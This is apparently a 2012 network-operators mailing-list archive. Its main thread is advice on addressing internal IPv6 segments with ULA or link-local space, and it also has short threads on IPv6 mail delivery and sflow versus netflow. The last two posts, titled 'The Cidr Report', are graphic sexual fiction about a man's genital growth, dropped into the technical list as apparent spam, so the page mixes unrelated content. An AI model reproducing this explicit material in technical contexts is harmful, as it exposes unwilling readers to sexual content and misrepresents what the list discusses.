(-Hammer-) Date: Fri, 13 Jul 2012 09:38:28 -0500 Subject: using "reserved" IPv6 space Message-ID: <500032E4.40804@gmail.com> OK. I'm pretty sure I'm gonna get some flak for this but I'll share this question and it's background anyway. Please be gentle. In the past, with IPv4, we have used reserved or "non-routable" space Internally in production for segments that won't be seen anywhere else. Examples? A sync VLAN for some FWs to share state. An IBGP link between routers that will never be seen or advertised. In those cases, we have often used 192.0.2.0/24. It's reserved and never used and even if it did get used one day we aren't "routing" it internally. It's just on segments where we need some L3 that will never be seen. On to IPv6 I was considering taking the same approach. Maybe using 0100::/8 or 1000::/4 or A000::/3 as a space for this. Other than the usual "Hey, you shouldn't do that" can anyone give me some IPv6 specific reasons that I may not be forecasting that would make it worse doing this than in an IPv4 scenario. I know, not apples to apples but for this question they are close enough. Unless there is something IPv6 specific that is influencing this.... -- -Hammer- "I was a normal American nerd" -Jack Herer From jeroen at unfix.org Fri Jul 13 09:41:41 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Fri, 13 Jul 2012 16:41:41 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <500032E4.40804@gmail.com> References: <500032E4.40804@gmail.com> Message-ID: <500033A5.4090707@unfix.org> On 2012-07-13 16:38, -Hammer- wrote: > OK. I'm pretty sure I'm gonna get some flak for this but I'll share this > question and it's background anyway. Please be gentle. > > In the past, with IPv4, we have used reserved or "non-routable" space > Internally in production for segments that won't be seen anywhere else. There is this very nice concept called ULA (RFC4193), use it. If you want to be more sure about uniqueness, use http://www.sixxs.net/tools/grh/ula/ or you can also just use a chunk of your 'global' prefix and don't announce a route for it and firewall it off properly. Greets, Jeroen From leo.vegoda at icann.org Fri Jul 13 09:41:37 2012 From: leo.vegoda at icann.org (Leo Vegoda) Date: Fri, 13 Jul 2012 07:41:37 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <500032E4.40804@gmail.com> References: <500032E4.40804@gmail.com> Message-ID: <41F6C547EA49EC46B4EE1EB2BC2F34185DA598DD28@EXVPMBX100-1.exc.icann.org> Hammer wrote: > In the past, with IPv4, we have used reserved or "non-routable" space > Internally in production for segments that won't be seen anywhere else. > Examples? A sync VLAN for some FWs to share state. An IBGP link between > routers that will never be seen or advertised. In those cases, we have > often used 192.0.2.0/24. It's reserved and never used and even if it did > get used one day we aren't "routing" it internally. It's just on > segments where we need some L3 that will never be seen. > > On to IPv6 > > I was considering taking the same approach. Maybe using 0100::/8 or > 1000::/4 or A000::/3 as a space for this. Why can't you just generate a ULA and use that? Regards, Leo -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 5488 bytes Desc: not available URL: From bhmccie at gmail.com Fri Jul 13 09:43:42 2012 From: bhmccie at gmail.com (-Hammer-) Date: Fri, 13 Jul 2012 09:43:42 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <500033A5.4090707@unfix.org> References: <500032E4.40804@gmail.com> <500033A5.4090707@unfix.org> Message-ID: <5000341E.9010703@gmail.com> Leo/Jeroen, Thank you both. That is the simple answer that I wasn't thinking of. I'm not as IPv6 savvy as I need to be (yet) so I haven't put all the pieces together when trying to look at the bigger picture. Thanks again. -Hammer- "I was a normal American nerd" -Jack Herer On 7/13/2012 9:41 AM, Jeroen Massar wrote: > On 2012-07-13 16:38, -Hammer- wrote: >> OK. I'm pretty sure I'm gonna get some flak for this but I'll share this >> question and it's background anyway. Please be gentle. >> >> In the past, with IPv4, we have used reserved or "non-routable" space >> Internally in production for segments that won't be seen anywhere else. > There is this very nice concept called ULA (RFC4193), use it. > If you want to be more sure about uniqueness, use > http://www.sixxs.net/tools/grh/ula/ > or you can also just use a chunk of your 'global' prefix and don't > announce a route for it and firewall it off properly. > > Greets, > Jeroen > From trejrco at gmail.com Fri Jul 13 10:05:40 2012 From: trejrco at gmail.com (TJ) Date: Fri, 13 Jul 2012 11:05:40 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <500032E4.40804@gmail.com> References: <500032E4.40804@gmail.com> Message-ID: On Fri, Jul 13, 2012 at 10:38 AM, -Hammer- wrote: > OK. I'm pretty sure I'm gonna get some flak for this but I'll share this > question and it's background anyway. Please be gentle. > > In the past, with IPv4, we have used reserved or "non-routable" space > Internally in production for segments that won't be seen anywhere else. > Examples? A sync VLAN for some FWs to share state. An IBGP link between > routers that will never be seen or advertised. In those cases, we have > often used 192.0.2.0/24. It's reserved and never used and even if it did > get used one day we aren't "routing" it internally. It's just on segments > where we need some L3 that will never be seen. > > On to IPv6 > > I was considering taking the same approach. Maybe using 0100::/8 or > 1000::/4 or A000::/3 as a space for this. > Would using "just" Link Locals not be sufficient? *(Failing that, as others noted, ULAs are the next "right" answer ... )* * * /TJ From bhmccie at gmail.com Fri Jul 13 10:45:57 2012 From: bhmccie at gmail.com (-Hammer-) Date: Fri, 13 Jul 2012 10:45:57 -0500 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> Message-ID: <500042B5.4030502@gmail.com> I think they would. I'm just a bit too new to this. Thanks. -Hammer- "I was a normal American nerd" -Jack Herer On 7/13/2012 10:05 AM, TJ wrote: > On Fri, Jul 13, 2012 at 10:38 AM, -Hammer- > wrote: > > OK. I'm pretty sure I'm gonna get some flak for this but I'll > share this question and it's background anyway. Please be gentle. > > In the past, with IPv4, we have used reserved or "non-routable" > space Internally in production for segments that won't be seen > anywhere else. Examples? A sync VLAN for some FWs to share state. > An IBGP link between routers that will never be seen or > advertised. In those cases, we have often used 192.0.2.0/24 > . It's reserved and never used and even if it > did get used one day we aren't "routing" it internally. It's just > on segments where we need some L3 that will never be seen. > > On to IPv6 > > I was considering taking the same approach. Maybe using 0100::/8 > or 1000::/4 or A000::/3 as a space for this. > > > > Would using "just" Link Locals not be sufficient? > /(Failing that, as others noted, ULAs are the next "right" answer ... )/ > / > / > /TJ From thomascooperca at gmail.com Fri Jul 13 11:11:26 2012 From: thomascooperca at gmail.com (Tom Cooper) Date: Fri, 13 Jul 2012 12:11:26 -0400 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> Message-ID: On Fri, Jul 13, 2012 at 11:05 AM, TJ wrote: > On Fri, Jul 13, 2012 at 10:38 AM, -Hammer- wrote: > > > OK. I'm pretty sure I'm gonna get some flak for this but I'll share this > > question and it's background anyway. Please be gentle. > > > > In the past, with IPv4, we have used reserved or "non-routable" space > > Internally in production for segments that won't be seen anywhere else. > > Examples? A sync VLAN for some FWs to share state. An IBGP link between > > routers that will never be seen or advertised. In those cases, we have > > often used 192.0.2.0/24. It's reserved and never used and even if it did > > get used one day we aren't "routing" it internally. It's just on segments > > where we need some L3 that will never be seen. > > > > On to IPv6 > > > > I was considering taking the same approach. Maybe using 0100::/8 or > > 1000::/4 or A000::/3 as a space for this. > > > > > Would using "just" Link Locals not be sufficient? > *(Failing that, as others noted, ULAs are the next "right" answer ... )* > * > * > /TJ > As an IPv6 newbie myself, I wonder how hosts handle link local, ULA and global addresses. For example, if you have some internal web traffic used for intranet use only, do you bind those servers to use only ULA addresses? This way your internal users with ULA addressing only have access to those servers? No need to give intranet-only servers a global address if they're not needed to be accessed globally. Is there a way for hosts to "prefer" or "attempt" to connect to a service by first trying a link-local scope, then a ULA and finally a global address if its off the AS? I really like the idea of ULA and think it makes much more sense than RFC1918 + NAT. I just don't have any deployment experience with it yet so I'm curious how the host would handle it. On the router side, I'm sure ULA and global routing just run as ships-in-the-night side-by-side anyways...right? -- Thomas Cooper From aid at logic.org.uk Fri Jul 13 11:17:29 2012 From: aid at logic.org.uk (Adrian Bool) Date: Fri, 13 Jul 2012 17:17:29 +0100 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> Message-ID: On 13 Jul 2012, at 17:11, Tom Cooper wrote: > On Fri, Jul 13, 2012 at 11:05 AM, TJ wrote: > > As an IPv6 newbie myself, I wonder how hosts handle link local, ULA and > global addresses. > For example, if you have some internal web traffic used for intranet use > only, do you bind those servers to use only ULA addresses? This way your > internal users with ULA addressing only have access to those servers? No > need to give intranet-only servers a global address if they're not needed > to be accessed globally. > > Is there a way for hosts to "prefer" or "attempt" to connect to a service > by first trying a link-local scope, then a ULA and finally a global address > if its off the AS? There is an RFC that describes how hosts should select addresses in such situations, http://tools.ietf.org/html/rfc3484 As an side; it would be great if some more IPv6 questions could be put on http://ipv6exchange.net/ - I would love to see that become a useful resource for people starting out with IPv6. If you have an IPv6 question, please do post! Cheers, aid From bhmccie at gmail.com Fri Jul 13 11:21:13 2012 From: bhmccie at gmail.com (-Hammer-) Date: Fri, 13 Jul 2012 11:21:13 -0500 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> Message-ID: <50004AF9.9010601@gmail.com> I'm having similar thoughts and we are about to implement. Fortunately we are implementing in an isolated lab first for this exact reason. For us to figure things out first before attempting them elsewhere. I like the ULA approach. I'm not sure about link local being used as strategy for Internal services. I'm finally getting to the point where I'm looking past the vastness of the numbers and just focusing on subnets and masks and subnetting and whatnot. -Hammer- "I was a normal American nerd" -Jack Herer On 7/13/2012 11:11 AM, Tom Cooper wrote: > On Fri, Jul 13, 2012 at 11:05 AM, TJ > wrote: > > On Fri, Jul 13, 2012 at 10:38 AM, -Hammer- > wrote: > > > OK. I'm pretty sure I'm gonna get some flak for this but I'll > share this > > question and it's background anyway. Please be gentle. > > > > In the past, with IPv4, we have used reserved or "non-routable" > space > > Internally in production for segments that won't be seen > anywhere else. > > Examples? A sync VLAN for some FWs to share state. An IBGP link > between > > routers that will never be seen or advertised. In those cases, > we have > > often used 192.0.2.0/24 . It's reserved and > never used and even if it did > > get used one day we aren't "routing" it internally. It's just on > segments > > where we need some L3 that will never be seen. > > > > On to IPv6 > > > > I was considering taking the same approach. Maybe using 0100::/8 or > > 1000::/4 or A000::/3 as a space for this. > > > > > Would using "just" Link Locals not be sufficient? > *(Failing that, as others noted, ULAs are the next "right" answer > ... )* > * > * > /TJ > > > As an IPv6 newbie myself, I wonder how hosts handle link local, ULA > and global addresses. > For example, if you have some internal web traffic used for intranet > use only, do you bind those servers to use only ULA addresses? This > way your internal users with ULA addressing only have access to those > servers? No need to give intranet-only servers a global address if > they're not needed to be accessed globally. > > Is there a way for hosts to "prefer" or "attempt" to connect to a > service by first trying a link-local scope, then a ULA and finally a > global address if its off the AS? > I really like the idea of ULA and think it makes much more sense than > RFC1918 + NAT. I just don't have any deployment experience with it yet > so I'm curious how the host would handle it. > > On the router side, I'm sure ULA and global routing just run as > ships-in-the-night side-by-side anyways...right? > > -- > Thomas Cooper From trejrco at gmail.com Fri Jul 13 11:34:15 2012 From: trejrco at gmail.com (TJ) Date: Fri, 13 Jul 2012 12:34:15 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <50004AF9.9010601@gmail.com> References: <500032E4.40804@gmail.com> <50004AF9.9010601@gmail.com> Message-ID: Note that I meant using Link Locals for directly connected devices *(neighbors; e.g. - routing protocol neighborship formation)*. If they are not on-link with each other, Link Locals are a non-starter ... ULAs would be a possible solution for a completely disconnected network. Note that many are proponents of using Globals even in those situations, with judicious filtering stopping any inboud/outbound traffic. The benefit being that "it's never going to be connected " doesn't really, always mean "it's never going to be connected" :). *YMMV, as always!* /TJ On Fri, Jul 13, 2012 at 12:21 PM, -Hammer- wrote: > I'm having similar thoughts and we are about to implement. Fortunately we > are implementing in an isolated lab first for this exact reason. For us to > figure things out first before attempting them elsewhere. > > I like the ULA approach. I'm not sure about link local being used as > strategy for Internal services. I'm finally getting to the point where I'm > looking past the vastness of the numbers and just focusing on subnets and > masks and subnetting and whatnot. > > -Hammer- > > "I was a normal American nerd" > -Jack Herer > > > > On 7/13/2012 11:11 AM, Tom Cooper wrote: > > On Fri, Jul 13, 2012 at 11:05 AM, TJ wrote: > >> On Fri, Jul 13, 2012 at 10:38 AM, -Hammer- wrote: >> >> > OK. I'm pretty sure I'm gonna get some flak for this but I'll share this >> > question and it's background anyway. Please be gentle. >> > >> > In the past, with IPv4, we have used reserved or "non-routable" space >> > Internally in production for segments that won't be seen anywhere else. >> > Examples? A sync VLAN for some FWs to share state. An IBGP link between >> > routers that will never be seen or advertised. In those cases, we have >> > often used 192.0.2.0/24. It's reserved and never used and even if it >> did >> > get used one day we aren't "routing" it internally. It's just on >> segments >> > where we need some L3 that will never be seen. >> > >> > On to IPv6 >> > >> > I was considering taking the same approach. Maybe using 0100::/8 or >> > 1000::/4 or A000::/3 as a space for this. >> > >> >> >> Would using "just" Link Locals not be sufficient? >> *(Failing that, as others noted, ULAs are the next "right" answer ... )* >> * >> * >> /TJ >> > > As an IPv6 newbie myself, I wonder how hosts handle link local, ULA and > global addresses. > For example, if you have some internal web traffic used for intranet use > only, do you bind those servers to use only ULA addresses? This way your > internal users with ULA addressing only have access to those servers? No > need to give intranet-only servers a global address if they're not needed > to be accessed globally. > > Is there a way for hosts to "prefer" or "attempt" to connect to a service > by first trying a link-local scope, then a ULA and finally a global address > if its off the AS? > I really like the idea of ULA and think it makes much more sense than > RFC1918 + NAT. I just don't have any deployment experience with it yet so > I'm curious how the host would handle it. > > On the router side, I'm sure ULA and global routing just run as > ships-in-the-night side-by-side anyways...right? > > -- > Thomas Cooper > > From skeeve at eintellego.net Fri Jul 13 11:37:49 2012 From: skeeve at eintellego.net (Skeeve Stevens) Date: Sat, 14 Jul 2012 02:37:49 +1000 Subject: using "reserved" IPv6 space In-Reply-To: <500032E4.40804@gmail.com> References: <500032E4.40804@gmail.com> Message-ID: See RFC 3849 - http://tools.ietf.org/html/rfc3849 Which pre-scribed the range: 2001:DB8::/32 for use in Documentation. I suppose this could be used for lab testing. *ducks flames* * * *Skeeve Stevens, CEO - *eintellego Pty Ltd skeeve at eintellego.net ; www.eintellego.net Phone: 1300 753 383; Cell +61 (0)414 753 383 ; skype://skeeve facebook.com/eintellego ; linkedin.com/in/skeeve twitter.com/networkceoau ; blog: www.network-ceo.net The Experts Who The Experts Call Juniper - Cisco ? IBM On Sat, Jul 14, 2012 at 12:38 AM, -Hammer- wrote: > OK. I'm pretty sure I'm gonna get some flak for this but I'll share this > question and it's background anyway. Please be gentle. > > In the past, with IPv4, we have used reserved or "non-routable" space > Internally in production for segments that won't be seen anywhere else. > Examples? A sync VLAN for some FWs to share state. An IBGP link between > routers that will never be seen or advertised. In those cases, we have > often used 192.0.2.0/24. It's reserved and never used and even if it did > get used one day we aren't "routing" it internally. It's just on segments > where we need some L3 that will never be seen. > > On to IPv6 > > I was considering taking the same approach. Maybe using 0100::/8 or > 1000::/4 or A000::/3 as a space for this. > > Other than the usual "Hey, you shouldn't do that" can anyone give me some > IPv6 specific reasons that I may not be forecasting that would make it > worse doing this than in an IPv4 scenario. I know, not apples to apples but > for this question they are close enough. Unless there is something IPv6 > specific that is influencing this.... > > -- > > > -Hammer- > > "I was a normal American nerd" > -Jack Herer > > > > From jbates at brightok.net Fri Jul 13 11:46:04 2012 From: jbates at brightok.net (Jack Bates) Date: Fri, 13 Jul 2012 11:46:04 -0500 Subject: Our first inbound email via IPv6 (was spam!) In-Reply-To: References: Message-ID: <500050CC.8080400@brightok.net> On 6/5/2012 9:29 AM, Raymond Dijkxhoorn wrote: > > Looking more closely... Is this still work in progress? > > ;; ANSWER SECTION: > comcast.net. 358 IN MX 5 mx3.comcast.net. > comcast.net. 358 IN MX 10 mx1.comcast.net. > comcast.net. 358 IN MX 5 mx2.comcast.net. > > ;; ADDITIONAL SECTION: > mx2.comcast.net. 6958 IN A 76.96.30.116 > mx3.comcast.net. 358 IN A 68.87.26.147 > mx1.comcast.net. 358 IN AAAA 2001:558:fe14:70::22 > > You are now only accepting IPv6 if all IPv4 fails? > Or will AAAA records for mx2 and mx3 added later? > Actually, I've had a problem with my version of sendmail on solaris choosing mx1.comcast.net and then reporting host not found. I think this is an issue with address selection, despite the server not being setup for v6 (os/sendmail are set for v6 support, but no assignment). I can't think of another reason why it would bounce 800+ emails with relay=mx1.comcast.net but have 0 logs for mx2/mx3. Jack From jeroen at unfix.org Fri Jul 13 12:01:55 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Fri, 13 Jul 2012 19:01:55 +0200 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> Message-ID: <50005483.9000307@unfix.org> On 2012-07-13 18:11, Tom Cooper wrote: [..] > As an IPv6 newbie myself Play with it and get your ears wet, it is still not entirely too late to start to learn to swim ;) >, I wonder how hosts handle link local, ULA and > global addresses. > For example, if you have some internal web traffic used for intranet use > only, do you bind those servers to use only ULA addresses? This way your > internal users with ULA addressing only have access to those servers? No > need to give intranet-only servers a global address if they're not needed > to be accessed globally. You could do that indeed, thus have clients have only a global (and link-local address) and only make a certain prefix, be that ULA or a specific chunk of your global prefix only available to your internal network that are used for your internal services. As long as the prefix is stable you likely do not care if it is global or ULA, this as when a misconfiguration happens in such a way that that prefix is not properly firewalled away or gets routed it happened. As can be clearly seen in various routing tables filtering is not happening everywhere, thus it won't buy you that much; proper policy, automation and verification will avoid fat fingers much better though. Also, not that a firewalled prefix only brings one that much security, the higher chance is that the client host gets infected or compromised. > Is there a way for hosts to "prefer" or "attempt" to connect to a service > by first trying a link-local scope, then a ULA and finally a global address > if its off the AS? RFC3484, aka /etc/gai.conf and friends on other OSs. It is not easy to distribute this though. > I really like the idea of ULA and think it makes much more sense than > RFC1918 + NAT. I just don't have any deployment experience with it yet so > I'm curious how the host would handle it. ULA is meant for non-internet connected devices. As such NAT does not come into play as one will have a unique ULA prefix that will not clash when you inter connect them privately with other networks. RFC1918 + NAT primarily makes sense as it allows one to hookup devices to the Internet without 'wasting' more public addresses, that problem does not exist with IPv6 though. Greets, Jeroen From dhubbard at dino.hostasaurus.com Fri Jul 13 12:30:25 2012 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Fri, 13 Jul 2012 13:30:25 -0400 Subject: Real world sflow vs netflow? Message-ID: Can anyone on or off list give me some real world thoughts on sflow vs netflow for border routers? (multi-homed, BGP, straight v4 & v6 only for web hosting, no mpls, vpns, vlans, etc.) Finding it hard to decipher the vendor version of the answer to that question. We use netflow v9 currently but are considering hardware that would be sflow. We don't use it for billing purposes, mostly for spotting malicious remote hosts doing things like scans, spotting traffic such as weird ports in use in either direction that warrant further investigation, watching for ddos/dos destinations to act on mitigation, or investigating the nature of unusual levels of traffic on switch ports that set off alarms. I'm concerned things like port scans, etc. won't be picked up by the NMS if fed by sflow due to the sampling nature, or similar concern if 500 ssh connections by the same remote host are sampled as 1 connection, etc. Of course these concerns were put in my head by someone interested in me continuing to use equipment that happens to output netflow data, hence me wanting some real people answers. :-) Thanks! From hugenog at rocketmail.com Fri Jul 13 12:41:52 2012 From: hugenog at rocketmail.com (HUGE NOG) Date: Fri, 13 Jul 2012 10:41:52 -0700 (PDT) Subject: The Cidr Report Message-ID: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> "What's wrong?" She asked, hearing the frustration in my voice. "It got bigger." I said. "What, your penis again?" She said, outside of the door. "Can I come in?" "Yeah, it's open." I said. My wife, Amanda, opened the door, peaking her head in. I smiled, because she looked so adorable peaking in like she was seeing a secret. I stood there, fully erect, with the tape measure in my hand. She smiled at me, then look at my penis. "Ugh, do you have to use the tape measure, we use that for the sewing. It's unsanitary." "It's easier to measure with this. Also it's the only way I can measure around. Besides, I wash it." I said. "You wash the tape measure?" She said, confused. I paused. "Yeah." "Right." She said. She then grabbed my penis, and examined it closely. "hm...It's hard for me to tell, I'm playing with it everyday. How big is it now?" "9.7 inches long, 6.3 around." I said. Holding my little notebook in my hand. "I really don't want to pass 10 inches..." My wife took it from my hand, and looked at it. "Wait, this says you were 9.2 inches long and 5.9 around?" "Yeah."I said. "That can't be right, you grew that much in just two weeks?" She said, confused. "Yes, it is. You helped me measure that time, remember?" I said. "Yeah, let me measure you now, you probably did it wrong." She said, taking the tape measure. She spun it around the shaft of my penis, in the middle. My shaft was oddly uniform, with no significant changes in girth up and down the shaft. "Ok yeah...you did mess up..." "What?" I asked. "You did make a mistake. You are just past 10 inches long...and 6.6 around" "God dammit, that's almost an inch longer in 2 weeks..." I said, frustrated. When I first realized I was growing, it was great and all, but now I was getting to a point where I was worried that it was causing my wife some discomfort. She would adapt usually, but the change in size would bother her sometimes. Whenever she would adapt, I would get bigger. I worried about the point when I would get too big for my petite wife. "I guess since it's your hands, it just made me harder." Amanda's face look the same as it did when I met her. She was 19, now she is 23. She had bright green eyes. She had small facial features, except for her big eyes. Her hair was pitch black, and she never dyed it. She was against that. She never wanted to fall too deeply into her appearance. Which she could easily do, because she had this natural beauty that radiated from her. Everything on her face was cute and well placed, from the freckles across her nose and checks, to the dimples she got only when she was mad. Amanda was 5'4", weighing a fit 115 lbs. She was very healthy, exercising daily and eating perfectly. She was thin and fit, with a well toned body, a full, awesome ass, and massive, perky, full 30 DD breasts. Her breasts seemingly defied gravity. Even though her body really has no impact on the size of the penis she could take (considering she can still handle my 10 incher), she was always tight down below. Even before I started growing, I needed a good amount of foreplay to even be able to fit my normal 6 incher in there. Now that I'm bigger, I need a lot more foreplay. "That doesn't make sense, how can you grow that much in just 2 weeks?" She asked. "I don't know, how can I grow from 6'2" to 6'6" in just 4 months? How can I gain almost 70 lbs, all of it muscle, in just 4 months, without working out? People constantly ask if I'm on steroids...not even body builders gain this much muscle this quickly. And look at my balls! If they get any bigger I'm not even gonna be able to walk correctly." I said. "I'm 25, I shouldn't be having such a big growth spurt." Amanda just smiled at me. "Tim, I don't understand how you are not liking this. I never thought a guy would be mad that he was getting taller, more muscular, and having a huge penis." "No, I do like it...it's just...I don't want to hurt you. I'm worried I'll get too big for you." I said. She snickered a bit. "Tim, I didn't marry you just because of your small penis. My ex was half your size when we got married, and I left him, didn't I?" I continued the joke. "He's so lucky, being so small. I wish I had a small cock." "Oh, I totally do to. So tiny I could barely feel it." She said, pretending to daydream. I laughed a bit. "I don't know...I just worry this might have some negative consequences." This whole time, Amanda was running her fingers up and down my long shaft. "I have to say, though, I do love how you can stay harder for much longer now." "Yeah..." I said. "And how much it stretches me..." I licked my lips as she slowly moved her face toward my penis, and licked up and down the shaft. "How it's so thick I can barely wrap my hand around it..." She said, and went back to licking and stroking my penis. "And how much you cum..."? She was right. Over the last 4 months, I've gained so much control over my erections, over the timing of my orgasms, the amount of orgasms I have, when and how much I cum. It's insane. Everyone else would love this. Why am I so frightened of this? I don't want to grow anymore. I want to be normal. Something in the back of my mind just makes me feel like this isn't right. That I need to do something. I was quickly distracted by this, as her hands and mouth felt amazing, running up and down my shaft. She was on her knees, and she quickly moved around the bathroom mats to ease the pain of her knees. Slowly, licking up and down my now massive shaft. After applying a good amount of saliva to my penis, she tried her best to stick my huge penis head in her mouth. She managed to, but couldn't open her jaw wide enough. Her teeth bothered me at first, but began to feel oddly nice as she used both of her tiny hands to stroke up and down my shaft. She pulled her mouth away. "I am sad that I can't deep throat you anymore..." She said, sticking her tongue out and tapping the tip of my penis with it slowly, and made a sexy smile up at me. She continued to stroke my penis with both her hands. Eventually, I grabbed her hand, and pulled her up. I pulled her against me, but facing away from me. My penis was on her right side, the difference in our height and the length of my penis brought it high enough for her to stroke it easily. I brought my left hand around, and put it down her pants, and began to stimulate her, as she stroked my penis. I bent down, and she put her head up, and we began kissing. She moaned softly. "God...even your fingers are big." She said, as I softly played between her legs. This continued for a few moments, as I waited for Amanda's breathing to increase. When this happened, I turned her toward me. Her pants had come off completely at this point, as we kissed. She eventually threw her shirt off, and I followed suite. I eventually picked her up, and we kissed. My penis was under her butt, seemingly holding her up. I made my way out of the bathroom, into the hallway, and put her back against the wall. To my right was the entrance to our house, and to my left was the living room. I lifted her up, and slowly put her onto my penis. I slowly pumped, picking up speed and going deeper and deeper into her, using her reactions and breathing to judge when the perfect moment would be. She was moaning softly. Amanda's reactions to sex, though, were never prominent. She was always quiet, and her face always had a calm, relaxed look on it, regardless of if we were just starting up, or if she was having mind blowing, insane, multi-orgasms that leave her unable to move. over the years I've known her, though, I've learned to find the subtle hints of her sexuality. Slowly, I took her off my penis, and set her on the ground. She walked over to a nearby table, and bent over it, sticking her perfect full ass up in the air. I felt like an animal, being lured over to a treat. I slowly stuck myself inside her again, and began going at it. It was passionate, as I slammed myself into her. The table was pounding into the wall and floor, her face and head kept accidently bumping into the wall. Each position goes on for some time. This last one seemed to be the most she could handle at the moment. I feel the very subtle quiver of Amanda's body, as she has an orgasm, and waves of fluid squirt onto my waist and groin. I continue, and only after a few seconds, she has another orgasm. This time, the quivering lasted for a good minute. She grabbed the end of the table with her hands as hard as she could, and bit her lip, as a third orgasm washed over her body. Her legs went limp, and then regained their stance, only to go limp again as an orgasm hit her again. Finally, she moved up, and I pulled out. "God...that was the best we've ever had." She said, and sat on the table. She grabbed my penis, and pulled it over closer to her. "Come on." She said, with a smile, stroking me. I looked over at the clock, seeing that we had been going at it for a good 2 hours. I couldn't help but shake this feeling that we were suppose to be somewhere... She stroked me faster and faster, and I nodded at her, letting her know I was about to cum. I shot my huge load, a massive string of semen flew out of my penis, striking her on the chest, and splashing elsewhere. This was followed by a 2nd, 3rd, and 4th. At this point, our door opened up, and Amanda's 2 friends, Rachel and Hannah, walked in. "Gah!" I said, confused, shooting another load. "Oh my God!" Rachel said. "What the...!" Hannah said, at the same time as Rachel. "Wah...I...guys! Knock!" Amanda said, jumping off the table. I know I should've just ran into the bathroom, which was 2 feet away. and had all my clothes in it. And had a door that could be easily closed. And a lock. And four walls to easily block the view of others. And is a room meant for doing private business. But I panicked. I backed up, and hit the wall behind me, shooting 2 more loads onto Amanda. I stumbled away from the girls, slipping on the juices me and my wife had left on the floor, falling to 1 knee, and shooting another load well into our living room. I got to my feet and quickly made my way into the living room and up the stairs, dribbling a lot of semen as I went, with my wife shouting at me. "What the...Tim stop!" She said, referring to how much I was cumming. The two women just stood in the doorway, Rachel with her hand over her mouth, trying to hide her smile, and Hannah looking sort of disgusted, but never looked away. "Dammit, I'm trying!" I said, stumbling up the stairs as quickly as possible. From hugenog at rocketmail.com Fri Jul 13 12:42:53 2012 From: hugenog at rocketmail.com (HUGE NOG) Date: Fri, 13 Jul 2012 10:42:53 -0700 (PDT) Subject: The Cidr Report In-Reply-To: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> It was 3 weeks after I passed the 10 inch mark. Our sex life was better than ever, even though I thought it would be the opposite. Amanda wanted sex several times a day. I never knew I was holding her back these years we were together. The fact that I have gained so much sexual power and stamina allows her to express her sexuality whenever she wanted it, and it was often. Luckily, this growth spurt happened after I got my job. It was a real good job, laid back. I could mostly work from home if I wanted, but I needed to establish myself, and went into the office often. Most importantly, I had great insurance, and was going to my first doctor's appointment today. I woke up to Amanda slowly rubbing her finger up and down my chest. "Morning, Mister Giant." She said, with a smile. Her subtle smirk that meant she wanted to have sex. "Hi." I said, groggily. "I glanced around the room for a second, then back at Amanda. "Sorry about the morning wood." I joked. "Ha, it just means you are ready." She said. I glanced down, and saw the penis head sticking way out of the waist band of my boxers. "Look, it's past your bellybutton." She said, poking my penis head. I sighed, frustrated. "I hate this." "Come on baby, you'll learn to like it. I did, right?" She said. "I'm past 11 inches..." I said, annoyed. "You could always do porn. I don't mind." She said, with a cute smile. I laughed a bit, and she looked disappointed for a second. "I really want to go at it...who could say they took an 11 incher? But I got class." She said, with a kiss, and hoped out of bed. Amanda was working at her Masters degree. "Are you gonna be home when I get back?" "Yeah, my doctor's appointment shouldn't take that long." I said, sitting up, watching her naked body strut to the bathroom. She knew she was turning me on. For a split second, she glanced at me just as she entered the bathroom, her smirk never leaving her face. She wanted to have sex so badly, and I felt bad for her. I just wanted to give her what she wanted. Luckily, she was more responsible than me, and knew when to say no. "You know," She called out from the bathroom. "I know it's been almost like, a month since the incident." She was referring to her friends, Rachel and Hannah, walking in on us having sex. "Rachel and Hannah have never stopped talking about how lucky I am." "Why's that?" I asked. "They seriously think you are the hottest guy ever." She explained. "Even before the growth, they always said you were attractive. But after seeing how big you are, they have been disappointed with every guy since." "Okay." I said, not sure what to say. I heard Amanda giggle a bit to my apathetic response. "Why do you bring this up?" "Oh, no reason." She said. I finally met my new doctor, and was a bit shocked. She looked like she was younger than me, but the degrees around her office proved that she was a professional. She was amazingly sexy. She wore her doctor's coat, but that did little to hide her massive breasts, easily more than double my wife's size. Her doctor's coat was open in the front, and her clothes were professional underneath, but her extremely wide hips and tiny waist were still clearly visible. She was easily 6'4", with short red red hair, and beautiful facial features. She could've easily become successful with just her looks alone, but her awards were too plentiful to be based solely on her appearance. Talk around the office was that she was an amazingly sexy Amazon, but too cold and professional to ever let anything happen. "You say only 5 months ago you were 6'2"?" She asked. "Yes a bit less than 5 months ago, and 180 lbs." I explained. "Now I'm passing 290 lbs, and..." "Yes, 6'7", I was there. I have to admit, it's funny that my nurse was unable to measure your height without my help." She said, and smiled. "Yeah...well, I'm 25, there is no reason I should be growing this fast..." I said. "This quick of a growth spurt isn't even common for young adults going through puberty." She said. "But I still need to complete this physical to send back to your offices." "I would prefer we didn't." I explained. "I'm...well. The growth spurt has impacted my...uh...genitals intensely as well." I said. "Well, I think that just justifies that I should examine you more." She said, coldly. "Um...I mean...I've been getting weird reactions from women lately..." I said. "Sir, I am a professional." She said, almost offended. "Now please." I sighed, and took off my pants. I expected a look of surprise, but she made more a look of confusion. "I apologize, I've just never seen such large testicles." She said. "Don't be surprised, I have to examine your testicles to see if this is a liquid build up or cancerous material." She explained, and she moved my 5 inch flaccid penis out of the way, and with her hands in gloves, she cupped my testicles. She slowly rubbed her hangs around my testicles, feeling for cancer or any other irregularities. "This is genuinely shocking. I didn't think 